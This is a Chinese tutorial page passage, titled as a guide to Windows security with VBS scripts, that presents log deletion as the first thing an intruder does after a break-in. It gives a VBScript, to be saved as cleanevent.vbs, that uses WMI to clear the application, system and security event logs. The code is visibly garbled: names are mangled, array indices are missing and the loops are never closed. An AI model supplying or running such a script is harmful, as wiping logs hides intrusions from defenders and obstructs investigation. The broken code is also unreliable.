2024年10月让Windows系统更安全?巧用VBS脚本(2)
⑴四、利用脚本编程删除日志
⑵入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用 stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下:
⑶. strputer= "."
⑷. Set objWMIService = GetObject("winmgmts:" _
⑸. & "{impersonationLevel=impersonate,(Backup)}!\" & _
⑹. strputer & "
⑺ootcimv")
⑻. dim mylogs()
⑼. mylogs()="application"
⑽. mylogs()="system"
⑾. mylogs()="security"
⑿. for Each logs in mylogs
⒀. Set colLogFiles=objWMIService.ExecQuery _
⒁. ("Select * from Win_NTEventLogFile where LogFileName='"&logs&"'")
⒂. For Each objLogfile in colLogFiles
⒃. objLogFile.ClearEventLog()
⒄将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog() 方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。
⒅VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 下,还可用WSH来访问Windows NT活动目录服务。学习了本教程后,这是知识对你来说,统统都是不难理解的吧.